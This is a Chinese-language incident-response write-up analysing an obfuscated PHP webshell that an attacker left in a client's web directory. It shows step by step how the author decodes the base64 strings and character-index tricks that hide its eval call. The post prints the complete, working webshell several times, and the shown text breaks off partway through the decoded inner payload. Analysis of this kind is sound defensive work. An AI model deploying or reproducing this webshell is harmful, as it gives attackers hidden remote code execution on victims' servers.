对某次应急响应中webshell的分析

news2024/11/26 16:32:55

文章前言

在之前处理一起应急事件时发现攻击者在WEB应用目录下上传了webshell,但是webshell似乎使用了某种加密混淆手法,无法直观的看到其中的木马连接密码,而客户非要让我们连接webshell来证实此文件为后门文件且可执行和利用(也是很恼火,本来就结束了,还得分析webshell),遂对提取到的webshell进行解密分析操作看看到底其内容是什么以及看一下这个其中到底使用了那种加密混淆手法对webshell进行混淆处理

样本文件

从客户环境中提取的webshell样本文件如下所示:

样本分析

首先对木马文件进行格式化处理:

<?php 
define('HLPHNk0717',__FILE__);
$fBqGfZ=base64_decode("bjF6Yi9tYTVcdnQwaTI4LXB4dXF5KjZscmtkZzlfZWhjc3dvNCtmMzdqZkxLeGNGT1ZrdHlYYmpXQkFwUURsTmVVSVN1SkV6ckN3Z1ladmlvc21QZGhIYXFSR1RuTQ==");
$KMoqeF=$fBqGfZ[3].$fBqGfZ[6].$fBqGfZ[33].$fBqGfZ[30];
$bBbJLf=$fBqGfZ[33].$fBqGfZ[10].$fBqGfZ[24].$fBqGfZ[10].$fBqGfZ[24];
$WgEkem=$bBbJLf[0].$fBqGfZ[18].$fBqGfZ[3].$bBbJLf[0].$bBbJLf[1].$fBqGfZ[24];
$eUgqfR=$fBqGfZ[7].$fBqGfZ[13];
$KMoqeF.=$fBqGfZ[22].$fBqGfZ[36].$fBqGfZ[29].$fBqGfZ[26].$fBqGfZ[30].$fBqGfZ[32].$fBqGfZ[35].$fBqGfZ[26].$fBqGfZ[30];
eval($KMoqeF("JEFNcVlmTj0iQVB5Tkx6YnJhZWlTQ3BHRVlrT2N2QnhkcXdabklzV2dSWEpNSGpEaHR1VWZsb1FtVkZUS3lNc0RRclRuQ1V3V0tZR0pQdmFScGdqZm14dWxGSGVaTFNBZGhvaWN6a1ZPTkVidFhJcUJNaTl4Q2h5WnVHWHRDZTVOQktmS0MzWVNxSUV4RHJKM0FzakZxSWdGcXRIeERySjNCcUh2ZkdEUXVYTmNNZUFjUjJWMkRJOXZ1ZURwdUdWRUZ0QW1Mb3V1Q3FOMGVYTGVQMkxrVlNmY1hKdjBxSWNLREdMUExvWFFDTllyUDIxMEMxWTZUR3VDWDJjbVByRHZmdjVpZkcxRFV0TGpldnVIUnRMSVdvdXdDMDVrUFhjR2RYZkhDSmpxWDBZMHVHSGpSWHVuVk5Yd2RWNURWdGpHVEdYWGFYSW9MdllwUDJIMWVHWGhlb0RMWGVMR1hOZkdXMURocWxZd2JxMDlGd3Y3QWhnWVBWZmlYbzB2ZkdEUXVYTmNlckRmUXdMMFAwek5lZUlURE4wa0FoTG9XMlh1UFhIcmQxMGtBaExvVzJYdVBYSHJkSTA3QWhnQ2VlZmp1bzB2ZkdEUXVYTmNlcmRyU1c0dmZHRFF1WE5jZXJKeFNXNHZmR0RRdVhOY2VyRjBTVzR2ZkdEUXVYTmNlckp4U1c0dmZHRFF1WE5jZXJGMFNxSHZUMnpjdWVmY01XTHhlTk5sUmV1VGRJMGtBaExvVzJYdVBYSGphSTBrQWhMb1cyWHVQWEhyU1c0dlJJWXV1M0l0ZXJnZlF3THhlTk5sUmV1VGRYMGtBaExvVzJYdVBYSHNESTA3QWhmQVVsTmt1bzB2ZkdEUXVYTmNlcmZmUXdMMFAwek5lZUlUZHFEZmFzTHhDZUloYjFQa01XTDBQMHpOZWVJVGRvQWZRd0wwUDB6TmVlSVRkcnVmUXdMMFAwek5lZUlUZG9OZlF3TDBQMHpOZWVJVGRvdWZRd0wwUDB6TmVlSVRkcmdmUXdMMFAwek5lZUlUZHJBZlF3TDBQMHpOZWVJVGRyWGZRd0wwUDB6TmVlSVRkb3VmUXdMMFAwek5lZUlUZHJnZmEyWDJQZXhFQWhnWVBWZmlYd1p3V3ZjV1VHZHNUSVh1VW9nWVZyZ1dESXZqZXZ1d2QwNVlWWGZDZE5QeENHenZMZWpWVmUwMVZlRGVUSmNTVElBV1gwZkdMSUxQWE5nd1gzWjJQMGNIUnRJU0NKMUNkbGdNUDJ6Q2QxdVhSR2pYVGVjTFBYdXhESVhTVmxEV1hxTmVWMVIxZGVKeFZ0NVNYcUl1WEdqQkN0SWtlbGZvWFZZUWV0MUdYR1hYdUpOdUMwUDJQckFlZDJEblVKakxkZUwwWHZ1Q0wyRnJWdjlYTEdqWFYyNWVWSUxJRGVOYUxpZ1lxckFlZE5OU2YyOUJVb1puV2x2MEMyRGhUR2NXZEo1U1cwRFdmMWZIVEc1b1gxTnBXdlI1Uk5OU1h0NXVWMmZudUpjR1V0SWVWdFlkYjFGclYxY3hEZUF6ZVNJRENlenJXdlI1Uk5OU1h0NXVWMmZudUpjR1V0SWVWdFlkYjFGclYxY3hEZUF6ZVNEQldHTEJ1ZTVIZlhZWUMzREJMck5zZVhmZVROTnF1Mnp2V0p1NlBYdVdDdmpKYlNEQldHTEJ1ZTVIZlhZWUMzZ1FWMkgzRnd2WWFyOCtNaTl4Q2h5WnVHWHRDZTVOQktmbVJOTDBSaFB4RHJKM0FzakZxSWdGcXRIeERySjNCcUh2dXZqSlhYWUpNZUFjUjJWMkRJOXZ1ZURwdUdWRUZ0QW1Mb3V1Q3FOMGVYTGVQMkxrVlNmY1hKdjBxSWNLREdMUExvWFFDTllyUDIxMEMxWTZUR3VDWDJjbVByRHZmdjVpZkcxRFV0TGpldlIxVUlmaHVpTHFkSUV4dWlES0xYVnhSSUlvZDJqclBlaldYMURHUmhBV2R0Y0RQb0FlTElBUGVOZ0NUZWo1WDFmQmIxTG5MTnV2WDA1QmVYdUJxdFhIdUlBd1ZxMDlGd3Y3QWhOcmIwakZicjB2dXZqSlhYWUplckRmUXdMdHFKTFhldkxURE4wa0FHdWRMSVhDTElIcmQxMGtBR3VkTElYQ0xJSHJkSTA3QUpOaXEyakdScjB2dXZqSlhYWUplcmRyU1c0dnV2akpYWFlKZXJKeFNXNHZ1dmpKWFhZSmVyRjBTVzR2dXZqSlhYWUplckp4U1c0dnV2akpYWFlKZXJGMFNxSHZldjFRVXYxSE1XTEFiMDlITGxEVGRJMGtBR3VkTElYQ0xJSGphSTBrQUd1ZExJWENMSUhyU1c0dldWRE1USnVyZXJnZlF3TEFiMDlITGxEVGRYMGtBR3VkTElYQ0xJSHNESTA3QUo5RlROZ2xXcjB2dXZqSlhYWUplcmZmUXdMdHFKTFhldkxUZHFEZmFzTDVSMERkV0pka01XTHRxSkxYZXZMVGRvQWZRd0x0cUpMWGV2TFRkcnVmUXdMdHFKTFhldkxUZG9OZlF3THRxSkxYZXZMVGRvdWZRd0x0cUpMWGV2TFRkcmdmUXdMdHFKTFhldkxUZHJBZlF3THRxSkxYZXZMVGRyWGZRd0x0cUpMWGV2TFRkb3VmUXdMdHFKTFhldkxUZHJnZmEyWDJQZXhFQWhOcmIwakZic1p3V3ZjRWRJZGpUSUF1WGlnWVBvSUhmMUxIVm9MU0xWWXFWWFhlTDFYaGV2NWVUSnVZWDIxeFVHQXpYb0RxTDJqUHVHenhMR1hQVnQ5Q2ROQURYaWd2VVhOUFJKWVdMM2JqUHZ1YVh0ZHNxbExxZFh1alBYZjRUWGZuRFNjVldHaktlb0lhcU5ZWHVpSVhYWEFTdWlJQlVOSWtib0F1ZGhMWGVlaktkSURHVEd6V1hySUJQMnpDZVhOU0NKemNkb3YwdWV6YWVHQW5hWExjTEdqaVZ0NUtEZUFoV2xYV1V2WWplcWdCWE51aFByWHZYMU40UHZjeENOWGhWdEllTEpYM1BYUmpiMDFJYVhMU0xJSjVXZVkwVEdMekxsRFFiMmRwVkdOb2ZWWUZUaFlMZGhjQVZTTmxDMURYcU5nd0xYWTZXMERXUFhMWGZpdVZYM2ZwV3ZjRWRJZGpUSUF1VjNmblhpZ0VmWFhodUpqUUN2TnhxSkRXUFhMWGZpdVZYM2ZwV3ZjRWRJZGpUSUF1VjNmblhpZ0VmWFhodUpqZGIxQWJWMFIxVlhFeFIzZ2RiMUFjWElYMEROTFNmMjlCV0daeFZySUhWTk5xZjNmZGIxQWJWMFIxVlhFeFIzZ1FWMnp4cTNSOU1XRllCcUgvTVo9PSI7ZXZhbCgnPz4nLiRLTW9xZUYoJGJCYkpMZigkV2dFa2VtKCRBTXFZZk4sJGVVZ3FmUioyKSwkV2dFa2VtKCRBTXFZZk4sJGVVZ3FmUiwkZVVncWZSKSwkV2dFa2VtKCRBTXFZZk4sMCwkZVVncWZSKSkpKTs="));?>

从上面可以看到这里执行了一次eval操作,同时eval里面还嵌套了一个变量,那么这个变量到底是什么,以及上面几个不规则的变量到底是什么意思呢?由于客户环境不能随意动,于是乎,直接开虚拟机在本地构建一个PHPstudy环境并将丢到WWW目录中在本地访问将内容其输出出来看看:

<?php 
define('HLPHNk0717',__FILE__);
$fBqGfZ=base64_decode("bjF6Yi9tYTVcdnQwaTI4LXB4dXF5KjZscmtkZzlfZWhjc3dvNCtmMzdqZkxLeGNGT1ZrdHlYYmpXQkFwUURsTmVVSVN1SkV6ckN3Z1ladmlvc21QZGhIYXFSR1RuTQ==");
$KMoqeF=$fBqGfZ[3].$fBqGfZ[6].$fBqGfZ[33].$fBqGfZ[30];
$bBbJLf=$fBqGfZ[33].$fBqGfZ[10].$fBqGfZ[24].$fBqGfZ[10].$fBqGfZ[24];
$WgEkem=$bBbJLf[0].$fBqGfZ[18].$fBqGfZ[3].$bBbJLf[0].$bBbJLf[1].$fBqGfZ[24];
$eUgqfR=$fBqGfZ[7].$fBqGfZ[13];
$KMoqeF.=$fBqGfZ[22].$fBqGfZ[36].$fBqGfZ[29].$fBqGfZ[26].$fBqGfZ[30].$fBqGfZ[32].$fBqGfZ[35].$fBqGfZ[26].$fBqGfZ[30];
echo $KMoqeF.'<br>';
echo $bBbJLf.'<br>';
echo $WgEkem.'<br>';
echo $eUgqfR.'<br>';
//eval($KMoqeF("JEFNcVlmTj0iQVB5Tkx6YnJhZWlTQ3BHRVlrT2N2QnhkcXdabklzV2dSWEpNSGpEaHR1VWZsb1FtVkZUS3lNc0RRclRuQ1V3V0tZR0pQdmFScGdqZm14dWxGSGVaTFNBZGhvaWN6a1ZPTkVidFhJcUJNaTl4Q2h5WnVHWHRDZTVOQktmS0MzWVNxSUV4RHJKM0FzakZxSWdGcXRIeERySjNCcUh2ZkdEUXVYTmNNZUFjUjJWMkRJOXZ1ZURwdUdWRUZ0QW1Mb3V1Q3FOMGVYTGVQMkxrVlNmY1hKdjBxSWNLREdMUExvWFFDTllyUDIxMEMxWTZUR3VDWDJjbVByRHZmdjVpZkcxRFV0TGpldnVIUnRMSVdvdXdDMDVrUFhjR2RYZkhDSmpxWDBZMHVHSGpSWHVuVk5Yd2RWNURWdGpHVEdYWGFYSW9MdllwUDJIMWVHWGhlb0RMWGVMR1hOZkdXMURocWxZd2JxMDlGd3Y3QWhnWVBWZmlYbzB2ZkdEUXVYTmNlckRmUXdMMFAwek5lZUlURE4wa0FoTG9XMlh1UFhIcmQxMGtBaExvVzJYdVBYSHJkSTA3QWhnQ2VlZmp1bzB2ZkdEUXVYTmNlcmRyU1c0dmZHRFF1WE5jZXJKeFNXNHZmR0RRdVhOY2VyRjBTVzR2ZkdEUXVYTmNlckp4U1c0dmZHRFF1WE5jZXJGMFNxSHZUMnpjdWVmY01XTHhlTk5sUmV1VGRJMGtBaExvVzJYdVBYSGphSTBrQWhMb1cyWHVQWEhyU1c0dlJJWXV1M0l0ZXJnZlF3THhlTk5sUmV1VGRYMGtBaExvVzJYdVBYSHNESTA3QWhmQVVsTmt1bzB2ZkdEUXVYTmNlcmZmUXdMMFAwek5lZUlUZHFEZmFzTHhDZUloYjFQa01XTDBQMHpOZWVJVGRvQWZRd0wwUDB6TmVlSVRkcnVmUXdMMFAwek5lZUlUZG9OZlF3TDBQMHpOZWVJVGRvdWZRd0wwUDB6TmVlSVRkcmdmUXdMMFAwek5lZUlUZHJBZlF3TDBQMHpOZWVJVGRyWGZRd0wwUDB6TmVlSVRkb3VmUXdMMFAwek5lZUlUZHJnZmEyWDJQZXhFQWhnWVBWZmlYd1p3V3ZjV1VHZHNUSVh1VW9nWVZyZ1dESXZqZXZ1d2QwNVlWWGZDZE5QeENHenZMZWpWVmUwMVZlRGVUSmNTVElBV1gwZkdMSUxQWE5nd1gzWjJQMGNIUnRJU0NKMUNkbGdNUDJ6Q2QxdVhSR2pYVGVjTFBYdXhESVhTVmxEV1hxTmVWMVIxZGVKeFZ0NVNYcUl1WEdqQkN0SWtlbGZvWFZZUWV0MUdYR1hYdUpOdUMwUDJQckFlZDJEblVKakxkZUwwWHZ1Q0wyRnJWdjlYTEdqWFYyNWVWSUxJRGVOYUxpZ1lxckFlZE5OU2YyOUJVb1puV2x2MEMyRGhUR2NXZEo1U1cwRFdmMWZIVEc1b1gxTnBXdlI1Uk5OU1h0NXVWMmZudUpjR1V0SWVWdFlkYjFGclYxY3hEZUF6ZVNJRENlenJXdlI1Uk5OU1h0NXVWMmZudUpjR1V0SWVWdFlkYjFGclYxY3hEZUF6ZVNEQldHTEJ1ZTVIZlhZWUMzREJMck5zZVhmZVROTnF1Mnp2V0p1NlBYdVdDdmpKYlNEQldHTEJ1ZTVIZlhZWUMzZ1FWMkgzRnd2WWFyOCtNaTl4Q2h5WnVHWHRDZTVOQktmbVJOTDBSaFB4RHJKM0FzakZxSWdGcXRIeERySjNCcUh2dXZqSlhYWUpNZUFjUjJWMkRJOXZ1ZURwdUdWRUZ0QW1Mb3V1Q3FOMGVYTGVQMkxrVlNmY1hKdjBxSWNLREdMUExvWFFDTllyUDIxMEMxWTZUR3VDWDJjbVByRHZmdjVpZkcxRFV0TGpldlIxVUlmaHVpTHFkSUV4dWlES0xYVnhSSUlvZDJqclBlaldYMURHUmhBV2R0Y0RQb0FlTElBUGVOZ0NUZWo1WDFmQmIxTG5MTnV2WDA1QmVYdUJxdFhIdUlBd1ZxMDlGd3Y3QWhOcmIwakZicjB2dXZqSlhYWUplckRmUXdMdHFKTFhldkxURE4wa0FHdWRMSVhDTElIcmQxMGtBR3VkTElYQ0xJSHJkSTA3QUpOaXEyakdScjB2dXZqSlhYWUplcmRyU1c0dnV2akpYWFlKZXJKeFNXNHZ1dmpKWFhZSmVyRjBTVzR2dXZqSlhYWUplckp4U1c0dnV2akpYWFlKZXJGMFNxSHZldjFRVXYxSE1XTEFiMDlITGxEVGRJMGtBR3VkTElYQ0xJSGphSTBrQUd1ZExJWENMSUhyU1c0dldWRE1USnVyZXJnZlF3TEFiMDlITGxEVGRYMGtBR3VkTElYQ0xJSHNESTA3QUo5RlROZ2xXcjB2dXZqSlhYWUplcmZmUXdMdHFKTFhldkxUZHFEZmFzTDVSMERkV0pka01XTHRxSkxYZXZMVGRvQWZRd0x0cUpMWGV2TFRkcnVmUXdMdHFKTFhldkxUZG9OZlF3THRxSkxYZXZMVGRvdWZRd0x0cUpMWGV2TFRkcmdmUXdMdHFKTFhldkxUZHJBZlF3THRxSkxYZXZMVGRyWGZRd0x0cUpMWGV2TFRkb3VmUXdMdHFKTFhldkxUZHJnZmEyWDJQZXhFQWhOcmIwakZic1p3V3ZjRWRJZGpUSUF1WGlnWVBvSUhmMUxIVm9MU0xWWXFWWFhlTDFYaGV2NWVUSnVZWDIxeFVHQXpYb0RxTDJqUHVHenhMR1hQVnQ5Q2ROQURYaWd2VVhOUFJKWVdMM2JqUHZ1YVh0ZHNxbExxZFh1alBYZjRUWGZuRFNjVldHaktlb0lhcU5ZWHVpSVhYWEFTdWlJQlVOSWtib0F1ZGhMWGVlaktkSURHVEd6V1hySUJQMnpDZVhOU0NKemNkb3YwdWV6YWVHQW5hWExjTEdqaVZ0NUtEZUFoV2xYV1V2WWplcWdCWE51aFByWHZYMU40UHZjeENOWGhWdEllTEpYM1BYUmpiMDFJYVhMU0xJSjVXZVkwVEdMekxsRFFiMmRwVkdOb2ZWWUZUaFlMZGhjQVZTTmxDMURYcU5nd0xYWTZXMERXUFhMWGZpdVZYM2ZwV3ZjRWRJZGpUSUF1VjNmblhpZ0VmWFhodUpqUUN2TnhxSkRXUFhMWGZpdVZYM2ZwV3ZjRWRJZGpUSUF1VjNmblhpZ0VmWFhodUpqZGIxQWJWMFIxVlhFeFIzZ2RiMUFjWElYMEROTFNmMjlCV0daeFZySUhWTk5xZjNmZGIxQWJWMFIxVlhFeFIzZ1FWMnp4cTNSOU1XRllCcUgvTVo9PSI7ZXZhbCgnPz4nLiRLTW9xZUYoJGJCYkpMZigkV2dFa2VtKCRBTXFZZk4sJGVVZ3FmUioyKSwkV2dFa2VtKCRBTXFZZk4sJGVVZ3FmUiwkZVVncWZSKSwkV2dFa2VtKCRBTXFZZk4sMCwkZVVncWZSKSkpKTs="));
?>

由此可以将上面的随机名称变量和具体的函数/操作进行对标:

$KMoqeF.'<br>';             base64_decode
$bBbJLf.'<br>';             strtr
$WgEkem.'<br>';             substr
$eUgqfR.'<br>';             52

可以看到这里的$KMoqeF为"base64_decode",随后我们将eval改为echo并直接进行一次输出看看到底执行了base64解码之后的什么内容:

<?php 
define('HLPHNk0717',__FILE__);
$fBqGfZ=base64_decode("bjF6Yi9tYTVcdnQwaTI4LXB4dXF5KjZscmtkZzlfZWhjc3dvNCtmMzdqZkxLeGNGT1ZrdHlYYmpXQkFwUURsTmVVSVN1SkV6ckN3Z1ladmlvc21QZGhIYXFSR1RuTQ==");
$KMoqeF=$fBqGfZ[3].$fBqGfZ[6].$fBqGfZ[33].$fBqGfZ[30];
$bBbJLf=$fBqGfZ[33].$fBqGfZ[10].$fBqGfZ[24].$fBqGfZ[10].$fBqGfZ[24];
$WgEkem=$bBbJLf[0].$fBqGfZ[18].$fBqGfZ[3].$bBbJLf[0].$bBbJLf[1].$fBqGfZ[24];
$eUgqfR=$fBqGfZ[7].$fBqGfZ[13];
$KMoqeF.=$fBqGfZ[22].$fBqGfZ[36].$fBqGfZ[29].$fBqGfZ[26].$fBqGfZ[30].$fBqGfZ[32].$fBqGfZ[35].$fBqGfZ[26].$fBqGfZ[30];
echo $KMoqeF.'<br>';
echo $bBbJLf.'<br>';
echo $WgEkem.'<br>';
echo $eUgqfR.'<br>';
echo($KMoqeF("JEFNcVlmTj0iQVB5Tkx6YnJhZWlTQ3BHRVlrT2N2QnhkcXdabklzV2dSWEpNSGpEaHR1VWZsb1FtVkZUS3lNc0RRclRuQ1V3V0tZR0pQdmFScGdqZm14dWxGSGVaTFNBZGhvaWN6a1ZPTkVidFhJcUJNaTl4Q2h5WnVHWHRDZTVOQktmS0MzWVNxSUV4RHJKM0FzakZxSWdGcXRIeERySjNCcUh2ZkdEUXVYTmNNZUFjUjJWMkRJOXZ1ZURwdUdWRUZ0QW1Mb3V1Q3FOMGVYTGVQMkxrVlNmY1hKdjBxSWNLREdMUExvWFFDTllyUDIxMEMxWTZUR3VDWDJjbVByRHZmdjVpZkcxRFV0TGpldnVIUnRMSVdvdXdDMDVrUFhjR2RYZkhDSmpxWDBZMHVHSGpSWHVuVk5Yd2RWNURWdGpHVEdYWGFYSW9MdllwUDJIMWVHWGhlb0RMWGVMR1hOZkdXMURocWxZd2JxMDlGd3Y3QWhnWVBWZmlYbzB2ZkdEUXVYTmNlckRmUXdMMFAwek5lZUlURE4wa0FoTG9XMlh1UFhIcmQxMGtBaExvVzJYdVBYSHJkSTA3QWhnQ2VlZmp1bzB2ZkdEUXVYTmNlcmRyU1c0dmZHRFF1WE5jZXJKeFNXNHZmR0RRdVhOY2VyRjBTVzR2ZkdEUXVYTmNlckp4U1c0dmZHRFF1WE5jZXJGMFNxSHZUMnpjdWVmY01XTHhlTk5sUmV1VGRJMGtBaExvVzJYdVBYSGphSTBrQWhMb1cyWHVQWEhyU1c0dlJJWXV1M0l0ZXJnZlF3THhlTk5sUmV1VGRYMGtBaExvVzJYdVBYSHNESTA3QWhmQVVsTmt1bzB2ZkdEUXVYTmNlcmZmUXdMMFAwek5lZUlUZHFEZmFzTHhDZUloYjFQa01XTDBQMHpOZWVJVGRvQWZRd0wwUDB6TmVlSVRkcnVmUXdMMFAwek5lZUlUZG9OZlF3TDBQMHpOZWVJVGRvdWZRd0wwUDB6TmVlSVRkcmdmUXdMMFAwek5lZUlUZHJBZlF3TDBQMHpOZWVJVGRyWGZRd0wwUDB6TmVlSVRkb3VmUXdMMFAwek5lZUlUZHJnZmEyWDJQZXhFQWhnWVBWZmlYd1p3V3ZjV1VHZHNUSVh1VW9nWVZyZ1dESXZqZXZ1d2QwNVlWWGZDZE5QeENHenZMZWpWVmUwMVZlRGVUSmNTVElBV1gwZkdMSUxQWE5nd1gzWjJQMGNIUnRJU0NKMUNkbGdNUDJ6Q2QxdVhSR2pYVGVjTFBYdXhESVhTVmxEV1hxTmVWMVIxZGVKeFZ0NVNYcUl1WEdqQkN0SWtlbGZvWFZZUWV0MUdYR1hYdUpOdUMwUDJQckFlZDJEblVKakxkZUwwWHZ1Q0wyRnJWdjlYTEdqWFYyNWVWSUxJRGVOYUxpZ1lxckFlZE5OU2YyOUJVb1puV2x2MEMyRGhUR2NXZEo1U1cwRFdmMWZIVEc1b1gxTnBXdlI1Uk5OU1h0NXVWMmZudUpjR1V0SWVWdFlkYjFGclYxY3hEZUF6ZVNJRENlenJXdlI1Uk5OU1h0NXVWMmZudUpjR1V0SWVWdFlkYjFGclYxY3hEZUF6ZVNEQldHTEJ1ZTVIZlhZWUMzREJMck5zZVhmZVROTnF1Mnp2V0p1NlBYdVdDdmpKYlNEQldHTEJ1ZTVIZlhZWUMzZ1FWMkgzRnd2WWFyOCtNaTl4Q2h5WnVHWHRDZTVOQktmbVJOTDBSaFB4RHJKM0FzakZxSWdGcXRIeERySjNCcUh2dXZqSlhYWUpNZUFjUjJWMkRJOXZ1ZURwdUdWRUZ0QW1Mb3V1Q3FOMGVYTGVQMkxrVlNmY1hKdjBxSWNLREdMUExvWFFDTllyUDIxMEMxWTZUR3VDWDJjbVByRHZmdjVpZkcxRFV0TGpldlIxVUlmaHVpTHFkSUV4dWlES0xYVnhSSUlvZDJqclBlaldYMURHUmhBV2R0Y0RQb0FlTElBUGVOZ0NUZWo1WDFmQmIxTG5MTnV2WDA1QmVYdUJxdFhIdUlBd1ZxMDlGd3Y3QWhOcmIwakZicjB2dXZqSlhYWUplckRmUXdMdHFKTFhldkxURE4wa0FHdWRMSVhDTElIcmQxMGtBR3VkTElYQ0xJSHJkSTA3QUpOaXEyakdScjB2dXZqSlhYWUplcmRyU1c0dnV2akpYWFlKZXJKeFNXNHZ1dmpKWFhZSmVyRjBTVzR2dXZqSlhYWUplckp4U1c0dnV2akpYWFlKZXJGMFNxSHZldjFRVXYxSE1XTEFiMDlITGxEVGRJMGtBR3VkTElYQ0xJSGphSTBrQUd1ZExJWENMSUhyU1c0dldWRE1USnVyZXJnZlF3TEFiMDlITGxEVGRYMGtBR3VkTElYQ0xJSHNESTA3QUo5RlROZ2xXcjB2dXZqSlhYWUplcmZmUXdMdHFKTFhldkxUZHFEZmFzTDVSMERkV0pka01XTHRxSkxYZXZMVGRvQWZRd0x0cUpMWGV2TFRkcnVmUXdMdHFKTFhldkxUZG9OZlF3THRxSkxYZXZMVGRvdWZRd0x0cUpMWGV2TFRkcmdmUXdMdHFKTFhldkxUZHJBZlF3THRxSkxYZXZMVGRyWGZRd0x0cUpMWGV2TFRkb3VmUXdMdHFKTFhldkxUZHJnZmEyWDJQZXhFQWhOcmIwakZic1p3V3ZjRWRJZGpUSUF1WGlnWVBvSUhmMUxIVm9MU0xWWXFWWFhlTDFYaGV2NWVUSnVZWDIxeFVHQXpYb0RxTDJqUHVHenhMR1hQVnQ5Q2ROQURYaWd2VVhOUFJKWVdMM2JqUHZ1YVh0ZHNxbExxZFh1alBYZjRUWGZuRFNjVldHaktlb0lhcU5ZWHVpSVhYWEFTdWlJQlVOSWtib0F1ZGhMWGVlaktkSURHVEd6V1hySUJQMnpDZVhOU0NKemNkb3YwdWV6YWVHQW5hWExjTEdqaVZ0NUtEZUFoV2xYV1V2WWplcWdCWE51aFByWHZYMU40UHZjeENOWGhWdEllTEpYM1BYUmpiMDFJYVhMU0xJSjVXZVkwVEdMekxsRFFiMmRwVkdOb2ZWWUZUaFlMZGhjQVZTTmxDMURYcU5nd0xYWTZXMERXUFhMWGZpdVZYM2ZwV3ZjRWRJZGpUSUF1VjNmblhpZ0VmWFhodUpqUUN2TnhxSkRXUFhMWGZpdVZYM2ZwV3ZjRWRJZGpUSUF1VjNmblhpZ0VmWFhodUpqZGIxQWJWMFIxVlhFeFIzZ2RiMUFjWElYMEROTFNmMjlCV0daeFZySUhWTk5xZjNmZGIxQWJWMFIxVlhFeFIzZ1FWMnp4cTNSOU1XRllCcUgvTVo9PSI7ZXZhbCgnPz4nLiRLTW9xZUYoJGJCYkpMZigkV2dFa2VtKCRBTXFZZk4sJGVVZ3FmUioyKSwkV2dFa2VtKCRBTXFZZk4sJGVVZ3FmUiwkZVVncWZSKSwkV2dFa2VtKCRBTXFZZk4sMCwkZVVncWZSKSkpKTs="));
?>


从上面我们可以看到输出的内容中有一串eval执行的内容,其中的变量正好是我们上面echo出来的内容,随后我们进行替换操作,替换后结果如下所示:

<?php 
$AMqYfN="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